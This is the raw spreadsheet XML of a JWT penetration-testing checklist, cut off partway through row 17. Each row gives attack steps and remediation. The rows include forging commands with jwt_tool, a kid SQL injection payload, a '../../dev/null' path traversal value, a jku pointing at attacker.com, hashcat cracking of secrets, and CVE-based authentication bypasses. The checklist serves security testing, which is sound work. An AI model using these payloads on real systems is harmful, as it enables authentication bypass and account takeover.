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WT Checklist" sheetId="1" state="visible" r:id="rId1"/>
    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Tools Reference" sheetId="2" state="visible" r:id="rId2"/>
    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="Progress Dashboard"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5"/>
    </font>
    <font>
      <name val="Calibri"/>
      <i val="1"/>
      <color rgb="00FFFFFF"/>
      <sz val="10"/>
    </font>
    <font>
      <name val="Calibri"/>
      <b val="1"/>
      <color rgb="00FFFFFF"/>
      <sz val="11"/>
    </font>
    <font>
      <name val="Calibri"/>
      <b val="1"/>
      <sz val="10"/>
    </font>
    <font>
      <name val="Calibri"/>
      <sz val="10"/>
    </font>
    <font>
      <name val="Calibri"/>
      <b val="1"/>
      <color rgb="00FFFFFF"/>
      <sz val="10"/>
    </font>
    <font>
      <name val="Calibri"/>
      <color rgb="000563C1"/>
      <sz val="10"/>
      <u val="single"/>
    </font>
    <font>
      <name val="Calibri"/>
      <b val="1"/>
      <color rgb="00000000"/>
      <sz val="10"/>
    </font>
    <font>
      <name val="Calibri"/>
      <i val="1"/>
      <color rgb="00888888"/>
      <sz val="9"/>
    </font>
    <font>
      <name val="Calibri"/>
      <i val="1"/>
      <color rgb="00555555"/>
      <sz val="10"/>
    </font>
  </fonts>
  <fills count="8">
    <fill>
      <patternFill/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="001F3864"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="002E4057"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="00C00000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="00E36C09"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="00FFD966"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="0070AD47"/>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indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment horizontal="left" vertical="top" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="6"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9" fillId="0" borderId="0" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="1" applyAlignment="1" pivotButton="0" quotePrefix="0" xfId="0">
      <alignment horizontal="left" vertical="top" wrapText="1" indent="1"/>
    </xf>
    <xf numFmtId="0" fontId="10"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9"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JWTChecklist" displayName="JWTChecklist" ref="B4:L40" headerRowCount="1">
  <autoFilter ref="B4:L40"/>
  <tableColumns count="11">
    <tableColumn id="2" name="#"/>
    <tableColumn id="3" name="Vulnerability Name"/>
    <tableColumn id="4" name="Category"/>
    <tableColumn id="5" name="Severity"/>
    <tableColumn id="6" name="CVE / Ref"/>
    <tableColumn id="7" name="Tools Required"/>
    <tableColumn id="8" name="Step-by-Step Testing"/>
    <tableColumn id="9" name="Expected Result (VULNERABLE)"/>
    <tableColumn id="10" name="Expected Result (SAFE / PASS)"/>
    <tableColumn id="11" name="Notes / Remediation"/>
    <tableColumn id="12" name="Tested?"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium2" showRowStripes="1"/>
</table>
</file>

<file path=xl/tables/table2.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="2" name="ToolsRef" displayName="ToolsRef" ref="B3:G18" headerRowCount="1">
  <autoFilter ref="B3:G18"/>
  <tableColumns count="6">
    <tableColumn id="2" name="Tool"/>
    <tableColumn id="3" name="Type"/>
    <tableColumn id="4" name="Install / Source"/>
    <tableColumn id="5" name="Primary Use"/>
    <tableColumn id="6" name="Key Commands / Notes"/>
    <tableColumn id="7" name="Link"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium6"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1F3864"/>
    <outlinePr summaryBelow="1" summaryRight="1"/>
    <pageSetUpPr/>
  </sheetPr>
  <dimension ref="B1:L4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4" customWidth="1" min="2" max="2"/>
    <col width="30" customWidth="1" min="3" max="3"/>
    <col width="26" customWidth="1" min="4" max="4"/>
    <col width="11" customWidth="1" min="5" max="5"/>
    <col width="18" customWidth="1" min="6" max="6"/>
    <col width="30" customWidth="1" min="7" max="7"/>
    <col width="55" customWidth="1" min="8" max="8"/>
    <col width="40" customWidth="1" min="9" max="9"/>
    <col width="40" customWidth="1" min="10" max="10"/>
    <col width="40" customWidth="1" min="11" max="11"/>
    <col width="10" customWidth="1" min="12" max="12"/>
  </cols>
  <sheetData>
    <row r="1" ht="36" customHeight="1">
      <c r="B1" s="1" t="inlineStr">
        <is>
          <t>JWT Vulnerability Penetration Testing Checklist</t>
        </is>
      </c>
    </row>
    <row r="2" ht="18" customHeight="1">
      <c r="B2" s="2" t="inlineStr">
        <is>
          <t>Full methodology: tools, step-by-step testing procedure, expected results  |  Generated: 2026-04-16</t>
        </is>
      </c>
    </row>
    <row r="3" ht="6" customHeight="1"/>
    <row r="4" ht="28" customHeight="1">
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>#</t>
        </is>
      </c>
      <c r="C4" s="3" t="inlineStr">
        <is>
          <t>Vulnerability Name</t>
        </is>
      </c>
      <c r="D4" s="3" t="inlineStr">
        <is>
          <t>Category</t>
        </is>
      </c>
      <c r="E4" s="3" t="inlineStr">
        <is>
          <t>Severity</t>
        </is>
      </c>
      <c r="F4" s="3" t="inlineStr">
        <is>
          <t>CVE / Ref</t>
        </is>
      </c>
      <c r="G4" s="3" t="inlineStr">
        <is>
          <t>Tools Required</t>
        </is>
      </c>
      <c r="H4" s="3" t="inlineStr">
        <is>
          <t>Step-by-Step Testing</t>
        </is>
      </c>
      <c r="I4" s="3" t="inlineStr">
        <is>
          <t>Expected Result (VULNERABLE)</t>
        </is>
      </c>
      <c r="J4" s="3" t="inlineStr">
        <is>
          <t>Expected Result (SAFE / PASS)</t>
        </is>
      </c>
      <c r="K4" s="3" t="inlineStr">
        <is>
          <t>Notes / Remediation</t>
        </is>
      </c>
      <c r="L4" s="3" t="inlineStr">
        <is>
          <t>Tested?</t>
        </is>
      </c>
    </row>
    <row r="5" ht="110" customHeight="1">
      <c r="B5" s="4" t="n">
        <v>1</v>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>Signature not verified</t>
        </is>
      </c>
      <c r="D5" s="6" t="inlineStr">
        <is>
          <t>Sig &amp; Algo Flaws</t>
        </is>
      </c>
      <c r="E5" s="7" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="F5" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G5" s="6" t="inlineStr">
        <is>
          <t>Burp Suite, jwt_tool, Postman</t>
        </is>
      </c>
      <c r="H5" s="6" t="inlineStr">
        <is>
          <t>1. Capture a valid JWT from proxy.
2. Decode payload (base64).
3. Modify a claim (e.g. role=admin).
4. Re-encode payload WITHOUT changing signature.
5. Replay modified token in Authorization header.
6. Observe server response.</t>
        </is>
      </c>
      <c r="I5" s="6" t="inlineStr">
        <is>
          <t>Server returns 200 OK and grants elevated access with tampered payload.</t>
        </is>
      </c>
      <c r="J5" s="6" t="inlineStr">
        <is>
          <t>Server returns 401/403. Signature mismatch rejected.</t>
        </is>
      </c>
      <c r="K5" s="6" t="inlineStr">
        <is>
          <t>Always verify JWT signature before trusting any claim. Use library's verify=True flag.</t>
        </is>
      </c>
      <c r="L5" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="6" ht="110" customHeight="1">
      <c r="B6" s="4" t="n">
        <v>2</v>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>alg:none Attack</t>
        </is>
      </c>
      <c r="D6" s="6" t="inlineStr">
        <is>
          <t>Sig &amp; Algo Flaws</t>
        </is>
      </c>
      <c r="E6" s="7" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="F6" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G6" s="6" t="inlineStr">
        <is>
          <t>jwt_tool (-X a), Burp Suite, CyberChef</t>
        </is>
      </c>
      <c r="H6" s="6" t="inlineStr">
        <is>
          <t>1. Capture JWT.
2. Run: python jwt_tool.py &lt;token&gt; -X a
3. Tool crafts token with alg:none and no signature.
4. Replay crafted token.
5. Try variations: 'None','NONE','nOnE' in alg header.</t>
        </is>
      </c>
      <c r="I6" s="6" t="inlineStr">
        <is>
          <t>Server accepts unsigned token; grants access / elevated privileges.</t>
        </is>
      </c>
      <c r="J6" s="6" t="inlineStr">
        <is>
          <t>Server returns 401. alg:none tokens rejected.</t>
        </is>
      </c>
      <c r="K6" s="6" t="inlineStr">
        <is>
          <t>Whitelist only permitted algorithms. Reject tokens where alg=none explicitly.</t>
        </is>
      </c>
      <c r="L6" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="7" ht="110" customHeight="1">
      <c r="B7" s="4" t="n">
        <v>3</v>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>Algorithm Confusion RS256→HS256</t>
        </is>
      </c>
      <c r="D7" s="6" t="inlineStr">
        <is>
          <t>Sig &amp; Algo Flaws</t>
        </is>
      </c>
      <c r="E7" s="7" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="F7" s="9" t="inlineStr">
        <is>
          <t>CVE-2016-5431</t>
        </is>
      </c>
      <c r="G7" s="6" t="inlineStr">
        <is>
          <t>jwt_tool (-X k), Burp Suite, openssl</t>
        </is>
      </c>
      <c r="H7" s="6" t="inlineStr">
        <is>
          <t>1. Obtain server's RSA public key (/.well-known/jwks.json or /api/public-key).
2. Run: python jwt_tool.py &lt;token&gt; -X k -pk public.pem
3. Tool re-signs token with HS256 using public key as HMAC secret.
4. Replay crafted token.</t>
        </is>
      </c>
      <c r="I7" s="6" t="inlineStr">
        <is>
          <t>Server verifies HS256 signature using its own public key; attack succeeds.</t>
        </is>
      </c>
      <c r="J7" s="6" t="inlineStr">
        <is>
          <t>Server enforces RS256 only; token rejected with 401.</t>
        </is>
      </c>
      <c r="K7" s="6" t="inlineStr">
        <is>
          <t>Hardcode expected algorithm on server-side. Never infer algorithm from token header.</t>
        </is>
      </c>
      <c r="L7" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="8" ht="110" customHeight="1">
      <c r="B8" s="4" t="n">
        <v>4</v>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>Sign/Encrypt Confusion</t>
        </is>
      </c>
      <c r="D8" s="6" t="inlineStr">
        <is>
          <t>Sig &amp; Algo Flaws</t>
        </is>
      </c>
      <c r="E8" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F8" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G8" s="6" t="inlineStr">
        <is>
          <t>jwt_tool, custom Python (PyJWT/python-jose)</t>
        </is>
      </c>
      <c r="H8" s="6" t="inlineStr">
        <is>
          <t>1. Check if app accepts both JWS (signed) and JWE (encrypted) tokens.
2. Craft JWE token with forged claims.
3. Present JWE token to endpoint expecting JWS.
4. Check if server decrypts without verifying inner signature.</t>
        </is>
      </c>
      <c r="I8" s="6" t="inlineStr">
        <is>
          <t>Server processes forged claims from JWE without verifying JWS signature.</t>
        </is>
      </c>
      <c r="J8" s="6" t="inlineStr">
        <is>
          <t>Server distinguishes JWS from JWE; rejects type mismatch.</t>
        </is>
      </c>
      <c r="K8" s="6" t="inlineStr">
        <is>
          <t>Strictly separate signing and encryption operations. Validate token type before processing.</t>
        </is>
      </c>
      <c r="L8" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="9" ht="110" customHeight="1">
      <c r="B9" s="4" t="n">
        <v>5</v>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>Polyglot Token Attack</t>
        </is>
      </c>
      <c r="D9" s="6" t="inlineStr">
        <is>
          <t>Sig &amp; Algo Flaws</t>
        </is>
      </c>
      <c r="E9" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F9" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G9" s="6" t="inlineStr">
        <is>
          <t>Custom Python script, jwt_tool</t>
        </is>
      </c>
      <c r="H9" s="6" t="inlineStr">
        <is>
          <t>1. Craft a token valid under two different JWT parsing contexts.
2. Present to different endpoints/microservices.
3. Observe if one service validates it under weaker rules.
4. Exploit looser validation path.</t>
        </is>
      </c>
      <c r="I9" s="6" t="inlineStr">
        <is>
          <t>Token accepted by service B under relaxed parsing rules despite being crafted for exploitation.</t>
        </is>
      </c>
      <c r="J9" s="6" t="inlineStr">
        <is>
          <t>All services enforce consistent, strict parsing; token rejected.</t>
        </is>
      </c>
      <c r="K9" s="6" t="inlineStr">
        <is>
          <t>Centralize JWT validation logic. Do not allow different parsing contexts across services.</t>
        </is>
      </c>
      <c r="L9" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="10" ht="110" customHeight="1">
      <c r="B10" s="4" t="n">
        <v>6</v>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>Billion Hashes DoS</t>
        </is>
      </c>
      <c r="D10" s="6" t="inlineStr">
        <is>
          <t>Sig &amp; Algo Flaws</t>
        </is>
      </c>
      <c r="E10" s="11" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="F10" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G10" s="6" t="inlineStr">
        <is>
          <t>curl, custom Python script</t>
        </is>
      </c>
      <c r="H10" s="6" t="inlineStr">
        <is>
          <t>1. Craft JWTs with maximally expensive PBKDF2 / bcrypt iterations or oversized keys.
2. Send 50–100 such tokens in rapid succession.
3. Monitor server CPU / response time.
4. Use tools like wrk or ab for load.</t>
        </is>
      </c>
      <c r="I10" s="6" t="inlineStr">
        <is>
          <t>Server CPU spikes to 100%; responses become slow or timeout (DoS condition).</t>
        </is>
      </c>
      <c r="J10" s="6" t="inlineStr">
        <is>
          <t>Server enforces token size/algo limits; CPU remains stable.</t>
        </is>
      </c>
      <c r="K10" s="6" t="inlineStr">
        <is>
          <t>Enforce maximum token size. Restrict allowed key lengths and iteration counts.</t>
        </is>
      </c>
      <c r="L10" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="11" ht="110" customHeight="1">
      <c r="B11" s="4" t="n">
        <v>7</v>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>JWK Header Injection</t>
        </is>
      </c>
      <c r="D11" s="6" t="inlineStr">
        <is>
          <t>Key Injection &amp; Header</t>
        </is>
      </c>
      <c r="E11" s="7" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="F11" s="9" t="inlineStr">
        <is>
          <t>CVE-2018-0114</t>
        </is>
      </c>
      <c r="G11" s="6" t="inlineStr">
        <is>
          <t>jwt_tool (-X i), Burp Suite, openssl</t>
        </is>
      </c>
      <c r="H11" s="6" t="inlineStr">
        <is>
          <t>1. Generate attacker RSA key pair: openssl genrsa -out attacker.pem 2048
2. Run: python jwt_tool.py &lt;token&gt; -X i
3. Tool embeds attacker's public key in 'jwk' header and re-signs with attacker private key.
4. Replay crafted token.</t>
        </is>
      </c>
      <c r="I11" s="6" t="inlineStr">
        <is>
          <t>Server reads 'jwk' from header and verifies with attacker's key; access granted.</t>
        </is>
      </c>
      <c r="J11" s="6" t="inlineStr">
        <is>
          <t>Server ignores 'jwk' header; uses only pre-configured trusted keys.</t>
        </is>
      </c>
      <c r="K11" s="6" t="inlineStr">
        <is>
          <t>Never accept keys from within the token itself. Use a server-side key store only.</t>
        </is>
      </c>
      <c r="L11" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="12" ht="110" customHeight="1">
      <c r="B12" s="4" t="n">
        <v>8</v>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>JKU (JWK Set URL) Injection</t>
        </is>
      </c>
      <c r="D12" s="6" t="inlineStr">
        <is>
          <t>Key Injection &amp; Header</t>
        </is>
      </c>
      <c r="E12" s="7" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="F12" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G12" s="6" t="inlineStr">
        <is>
          <t>jwt_tool (-X s), Burp Suite, ngrok / python -m http.server</t>
        </is>
      </c>
      <c r="H12" s="6" t="inlineStr">
        <is>
          <t>1. Host malicious JWKS file at attacker URL (e.g. https://attacker.com/jwks.json).
2. Generate attacker RSA keypair.
3. Set 'jku' header in token to attacker URL.
4. Sign token with attacker private key.
5. Replay token.</t>
        </is>
      </c>
      <c r="I12" s="6" t="inlineStr">
        <is>
          <t>Server fetches attacker's JWKS; verifies token with attacker's public key; access granted.</t>
        </is>
      </c>
      <c r="J12" s="6" t="inlineStr">
        <is>
          <t>Server whitelists allowed 'jku' domains; rejects external URLs.</t>
        </is>
      </c>
      <c r="K12" s="6" t="inlineStr">
        <is>
          <t>Whitelist permitted jku domains. Prefer ignoring jku header entirely; use static key configuration.</t>
        </is>
      </c>
      <c r="L12" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="13" ht="110" customHeight="1">
      <c r="B13" s="4" t="n">
        <v>9</v>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>kid SQL Injection</t>
        </is>
      </c>
      <c r="D13" s="6" t="inlineStr">
        <is>
          <t>Key Injection &amp; Header</t>
        </is>
      </c>
      <c r="E13" s="7" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="F13" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G13" s="6" t="inlineStr">
        <is>
          <t>Burp Suite, sqlmap, manual crafting</t>
        </is>
      </c>
      <c r="H13" s="6" t="inlineStr">
        <is>
          <t>1. Intercept request with JWT.
2. Decode header; locate 'kid' field.
3. Set kid to: ' UNION SELECT 'attacker_secret' --
4. Sign token with HMAC using 'attacker_secret'.
5. Replay and observe if accepted.</t>
        </is>
      </c>
      <c r="I13" s="6" t="inlineStr">
        <is>
          <t>SQL injection in kid resolves to attacker-controlled key; forged token accepted.</t>
        </is>
      </c>
      <c r="J13" s="6" t="inlineStr">
        <is>
          <t>Server sanitizes/parameterizes kid query; SQL injection rejected.</t>
        </is>
      </c>
      <c r="K13" s="6" t="inlineStr">
        <is>
          <t>Use parameterized queries for kid lookups. Validate kid format (UUID/hex only).</t>
        </is>
      </c>
      <c r="L13" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="14" ht="110" customHeight="1">
      <c r="B14" s="4" t="n">
        <v>10</v>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>kid Path Traversal</t>
        </is>
      </c>
      <c r="D14" s="6" t="inlineStr">
        <is>
          <t>Key Injection &amp; Header</t>
        </is>
      </c>
      <c r="E14" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F14" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G14" s="6" t="inlineStr">
        <is>
          <t>jwt_tool (-T), Burp Suite, manual crafting</t>
        </is>
      </c>
      <c r="H14" s="6" t="inlineStr">
        <is>
          <t>1. Set 'kid' to: ../../dev/null (or known zero-byte file path).
2. Sign token with empty HMAC key (empty string or null bytes).
3. Replay crafted token.
4. Try /proc/sys/kernel/randomize_va_space (returns '2') etc.</t>
        </is>
      </c>
      <c r="I14" s="6" t="inlineStr">
        <is>
          <t>Server loads file content as HMAC secret; attacker-signed token accepted.</t>
        </is>
      </c>
      <c r="J14" s="6" t="inlineStr">
        <is>
          <t>Server validates kid as an opaque identifier; no file path lookups.</t>
        </is>
      </c>
      <c r="K14" s="6" t="inlineStr">
        <is>
          <t>Validate kid against allowlist of known key IDs. Never use kid as a file path.</t>
        </is>
      </c>
      <c r="L14" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="15" ht="110" customHeight="1">
      <c r="B15" s="4" t="n">
        <v>11</v>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>JWK Signing Key Injection (CVE-2025-24976)</t>
        </is>
      </c>
      <c r="D15" s="6" t="inlineStr">
        <is>
          <t>Key Injection &amp; Header</t>
        </is>
      </c>
      <c r="E15" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F15" s="9" t="inlineStr">
        <is>
          <t>CVE-2025-24976</t>
        </is>
      </c>
      <c r="G15" s="6" t="inlineStr">
        <is>
          <t>jwt_tool, Burp Suite, custom Python</t>
        </is>
      </c>
      <c r="H15" s="6" t="inlineStr">
        <is>
          <t>1. Obtain a valid token.
2. Craft JWK with attacker key material but preserved trusted kid.
3. Inject into jwk header field.
4. Sign with attacker private key.
5. Replay token.</t>
        </is>
      </c>
      <c r="I15" s="6" t="inlineStr">
        <is>
          <t>Server validates kid metadata only; accepts attacker-injected key material.</t>
        </is>
      </c>
      <c r="J15" s="6" t="inlineStr">
        <is>
          <t>Server validates both kid AND key material against trusted store.</t>
        </is>
      </c>
      <c r="K15" s="6" t="inlineStr">
        <is>
          <t>Validate full key object against trusted keystore, not just kid metadata.</t>
        </is>
      </c>
      <c r="L15" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="16" ht="110" customHeight="1">
      <c r="B16" s="4" t="n">
        <v>12</v>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>Weak HMAC Secret / Brute Force</t>
        </is>
      </c>
      <c r="D16" s="6" t="inlineStr">
        <is>
          <t>Weak Secrets &amp; Keys</t>
        </is>
      </c>
      <c r="E16" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F16" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G16" s="6" t="inlineStr">
        <is>
          <t>hashcat, jwt_tool (-C -d), jwt-cracker, john the ripper</t>
        </is>
      </c>
      <c r="H16" s="6" t="inlineStr">
        <is>
          <t>1. Extract JWT from request.
2. Run: hashcat -a 0 -m 16500 &lt;jwt&gt; /usr/share/wordlists/rockyou.txt
   OR: python jwt_tool.py &lt;token&gt; -C -d wordlist.txt
3. Wait for crack result.
4. If cracked, forge new token with jwt_tool: python jwt_tool.py &lt;token&gt; -S hs256 -p &lt;secret&gt;</t>
        </is>
      </c>
      <c r="I16" s="6" t="inlineStr">
        <is>
          <t>Secret is found; attacker forges tokens with arbitrary claims.</t>
        </is>
      </c>
      <c r="J16" s="6" t="inlineStr">
        <is>
          <t>No secret found after exhaustive wordlist attack; secret is sufficiently random (256-bit+).</t>
        </is>
      </c>
      <c r="K16" s="6" t="inlineStr">
        <is>
          <t>Use cryptographically random secrets of at least 256 bits. Store in secrets manager, not code.</t>
        </is>
      </c>
      <c r="L16" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="17" ht="110" customHeight="1">
      <c r="B17" s="4" t="n">
        <v>13</v>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>Hardcoded JWT Secret (CVE-2024-46612)</t>
        </is>
      </c>
      <c r="D17" s="6" t="inlineStr">
        <is>
          <t>Weak Secrets &amp; Keys</t>
        </is>
      </c>
      <c r="E17" s="7" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="F17" s="9" t="inlineStr">
        <is>
          <t>CVE-2024-46612</t>
        </is>
      </c>
      <c r="G17" s="6" t="inlineStr">
        <is>
          <t>grep, strings, Ghidra, source code review, truffleHog</t>
        </is>
      </c>
      <c r="H17" s="6" t="inlineStr">
        <is>
          <t>1. Download/decompile application source or firmware.
2. Run: grep -r 'jwt_secret\|JWT_KEY\|secret_key' .
3. Run: truffleHog --regex --entropy=False .
4. Use Ghidra/strings on binary for embedded secrets.
5. Extract found secret; forge token.</t>
        </is>
      </c>
      <c r="I17" s="6" t="inlineStr">
        <is>
          <t>Secret found in code/binary; attacker forges valid tokens.</t>
        </is>
      </c>
      <c r="J17" s="6" t="inlineStr">
        <is>
          <t>No secrets in code; secrets loaded from environment/secrets manager.</t>
        </is>
      </c>
      <c r="K17" s="6" t="inlineStr">
        <is>
          <t>Remove all hardcoded secrets. Use environment variables or vaults (HashiCorp Vault, AWS Secrets Manager).</t>
        </is>
      </c>
      <c r="L17" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="18" ht="110" customHeight="1">
      <c r="B18" s="4" t="n">
        <v>14</v>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>Hardcoded JWT Secret (CVE-2025-2079 / Optigo)</t>
        </is>
      </c>
      <c r="D18" s="6" t="inlineStr">
        <is>
          <t>Weak Secrets &amp; Keys</t>
        </is>
      </c>
      <c r="E18" s="7" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="F18" s="9" t="inlineStr">
        <is>
          <t>CVE-2025-2079</t>
        </is>
      </c>
      <c r="G18" s="6" t="inlineStr">
        <is>
          <t>binwalk, strings, Ghidra, firmware-analysis-toolkit</t>
        </is>
      </c>
      <c r="H18" s="6" t="inlineStr">
        <is>
          <t>1. Extract firmware: binwalk -e firmware.bin
2. Search for JWT-related strings: grep -r 'secret\|HS256\|bearer' extracted/
3. Identify hardcoded key.
4. Forge token and replay.</t>
        </is>
      </c>
      <c r="I18" s="6" t="inlineStr">
        <is>
          <t>Hardcoded key extracted; full authentication bypass on Optigo Networks device.</t>
        </is>
      </c>
      <c r="J18" s="6" t="inlineStr">
        <is>
          <t>No secrets in firmware; runtime-loaded keys only.</t>
        </is>
      </c>
      <c r="K18" s="6" t="inlineStr">
        <is>
          <t>Rotate all hardcoded keys immediately. Implement secure key provisioning in firmware.</t>
        </is>
      </c>
      <c r="L18" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="19" ht="110" customHeight="1">
      <c r="B19" s="4" t="n">
        <v>15</v>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>Hardcoded JWT Secret (CVE-2025-20188 / Cisco IOS XE)</t>
        </is>
      </c>
      <c r="D19" s="6" t="inlineStr">
        <is>
          <t>Weak Secrets &amp; Keys</t>
        </is>
      </c>
      <c r="E19" s="7" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="F19" s="9" t="inlineStr">
        <is>
          <t>CVE-2025-20188</t>
        </is>
      </c>
      <c r="G19" s="6" t="inlineStr">
        <is>
          <t>strings, nmap, Burp Suite, PoC scripts</t>
        </is>
      </c>
      <c r="H19" s="6" t="inlineStr">
        <is>
          <t>1. Identify Cisco IOS XE target version via nmap/banner grab.
2. Use public PoC or extract hardcoded secret from firmware.
3. Craft admin JWT using extracted secret.
4. Access privileged API endpoints.</t>
        </is>
      </c>
      <c r="I19" s="6" t="inlineStr">
        <is>
          <t>Full admin access to Cisco IOS XE device; potential RCE.</t>
        </is>
      </c>
      <c r="J19" s="6" t="inlineStr">
        <is>
          <t>Patched firmware installed; runtime-generated keys used.</t>
        </is>
      </c>
      <c r="K19" s="6" t="inlineStr">
        <is>
          <t>Apply Cisco security advisory patch immediately. Monitor for unauthorized access.</t>
        </is>
      </c>
      <c r="L19" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="20" ht="110" customHeight="1">
      <c r="B20" s="4" t="n">
        <v>16</v>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>Missing exp (Expiration) Validation</t>
        </is>
      </c>
      <c r="D20" s="6" t="inlineStr">
        <is>
          <t>Claim Validation</t>
        </is>
      </c>
      <c r="E20" s="10" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="F20" s="8" t="inlineStr">
        <is>
          <t>N/A</t>
        </is>
      </c>
      <c r="G20" s="6" t="inlineStr">
        <is>
          <t>jwt_tool, Burp Suite, manual crafting</t>
        </is>
      </c>
      <c r="H20" s="6" t="inlineStr">
        <is>
          <t>1. Capture a valid JWT.
2. Decode and check 'exp' claim.
3. Wait until token is expired (or set exp to past date: 1).
4. Replay expired token in request.
5. Observe if server still accepts it.</t>
        </is>
      </c>
      <c r="I20" s="6" t="inlineStr">
        <is>
          <t>Server accepts expired token; no expiry enforcement.</t>
        </is>
      </c>
      <c r="J20" s="6" t="inlineStr">
        <is>
          <t>Server returns 401 with 'Token expired' error.</t>
        </is>
      </c>
      <c r="K20" s="6" t="inlineStr">
        <is>
          <t>Always validate exp claim. Set short token lifetimes (15 min for access tokens).</t>
        </is>
      </c>
      <c r="L20" s="6" t="inlineStr">
        <is>
          <t>☐ Not Tested</t>
        </is>
      </c>
    </row>
    <row r="21" ht="110" customHeight="1">
      <c r="B21" s="4" t="n">
        <v>17</v>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>Long-Lived Token</t>
        </is>
      </c>
